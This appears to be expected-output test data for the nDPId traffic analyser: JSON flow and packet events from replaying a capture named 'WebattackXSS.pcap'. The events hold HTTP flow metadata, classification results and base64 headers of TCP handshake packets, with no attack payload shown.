+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1499347107720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347107720,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GMhAAD4GrRCsEAABwKgKMtG8AFANSWhsqzdgDYAQAOXz+AAAAQEICgE5cK0D40Ij"} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1499346976677,"flow_last_seen":1499346982914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5330,"flow_tot_l4_payload_len":6852,"flow_avg_l4_payload_len":527,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499346976999,"flow_last_seen":1499346982906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1707,"flow_tot_l4_payload_len":2065,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346976999,"flow_last_seen":1499346982607,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346976999,"flow_last_seen":1499346982607,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346983175,"flow_last_seen":1499346988608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346983175,"flow_last_seen":1499346988608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347110266,"flow_last_seen":1499347110266,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347110266,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1499347110266,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347110266,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8u39AAD4GClGsEAABwKgKMtHWAFDeH8hWAAAAAKACchByBAAAAgQFtAQCCAoBOXMpAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1499347110266,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347110266,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0dbJG1vv3h\/IV6AScSAFVQAAAgQFtAQCCAoD40SgATlzKQEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1212,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":3,"flow_last_seen":1499347110267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347110267,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0u4BAAD4GClisEAABwKgKMtHWAFDeH8hXyRtb8IAQAOWkXAAAAQEICgE5cykD40Sg"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347111565,"flow_last_seen":1499347111565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347111565,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1499347111565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347111565,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ioRAAD4GO0ysEAABwKgKMtHkAFDzev7qAAAAAKACchAkwgAAAgQFtAQCCAoBOXRuAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1499347111565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347111565,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0eR9BdLY83r+66AScSCL+wAAAgQFtAQCCAoD40XkATl0bgEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":3,"flow_last_seen":1499347111565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347111565,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ioVAAD4GO1OsEAABwKgKMtHkAFDzev7rfQXS2YAQAOUrAwAAAQEICgE5dG4D40Xk"} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1243,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347114111,"flow_last_seen":1499347114111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347114111,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1499347114111,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347114111,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8emxAAD4GS2SsEAABwKgKMtH+AFCQhwyGAAAAAKACchB3hAAAAgQFtAQCCAoBOXbqAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1244,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1499347114111,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347114111,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0f6FLaNRkIcMh6AScSADoAAAAgQFtAQCCAoD40hhATl26gEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1499347114112,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347114112,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0em1AAD4GS2usEAABwKgKMtH+AFCQhwyHhS2jUoAQAOWipgAAAQEICgE5dusD40hh"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1252,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347115408,"flow_last_seen":1499347115408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347115408,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1499347115408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347115408,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8N6NAAD4Gji2sEAABwKgKMtIMAFCkuE+MAAAAAKACchAe+gAAAgQFtAQCCAoBOXgvAAAAAAEDAwc="} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1499347115408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347115408,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0gwQkJx6pLhPjaAScSAlRgAAAgQFtAQCCAoD40mlATl4LwEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1254,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":3,"flow_last_seen":1499347115409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347115409,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0N6RAAD4GjjSsEAABwKgKMtIMAFCkuE+NEJCce4AQAOXETQAAAQEICgE5eC8D40ml"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347116705,"flow_last_seen":1499347116705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347116705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1499347116705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347116705,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8FEVAAD4GsYusEAABwKgKMtIaAFCixG02AAAAAKACchAB8gAAAgQFtAQCCAoBOXlzAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1268,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1499347116705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347116705,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0hqTGb4kosRtN6AScSBixgAAAgQFtAQCCAoD40rpATl5cwEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1269,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1499347116706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347116706,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0FEZAAD4GsZKsEAABwKgKMtIaAFCixG03kxm+JYAQAOUBzgAAAQEICgE5eXMD40rp"} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347119336,"flow_last_seen":1499347119336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119336,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1499347119336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347119336,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AVBAAD4GxICsEAABwKgKMtI0AFAiVX1VAAAAAKACchBvlgAAAgQFtAQCCAoBOXwFAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1499347119336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347119336,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0jRzeBsiIlV9VqAScSCQfAAAAgQFtAQCCAoD4017ATl8BQEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1284,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":3,"flow_last_seen":1499347119336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347119336,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AVFAAD4GxIesEAABwKgKMtI0AFAiVX1Wc3gbI4AQAOUvhAAAAQEICgE5fAUD4017"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346984469,"flow_last_seen":1499346989608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346984469,"flow_last_seen":1499346989608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499346985762,"flow_last_seen":1499346991610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52414,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499346985762,"flow_last_seen":1499346991610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346988319,"flow_last_seen":1499346993610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346988319,"flow_last_seen":1499346993610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346989580,"flow_last_seen":1499346994610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346989580,"flow_last_seen":1499346994610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346992144,"flow_last_seen":1499346997611,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52480,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346992144,"flow_last_seen":1499346997611,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346993434,"flow_last_seen":1499346998611,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52494,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346993434,"flow_last_seen":1499346998611,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347119643,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1294,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347120603,"flow_last_seen":1499347120603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347120603,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1294,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1499347120603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347120603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA815JAAD4G7j2sEAABwKgKMtJCAFDFAarTAAAAAKACchCeIQAAAgQFtAQCCAoBOX1BAAAAAAEDAwc="} 
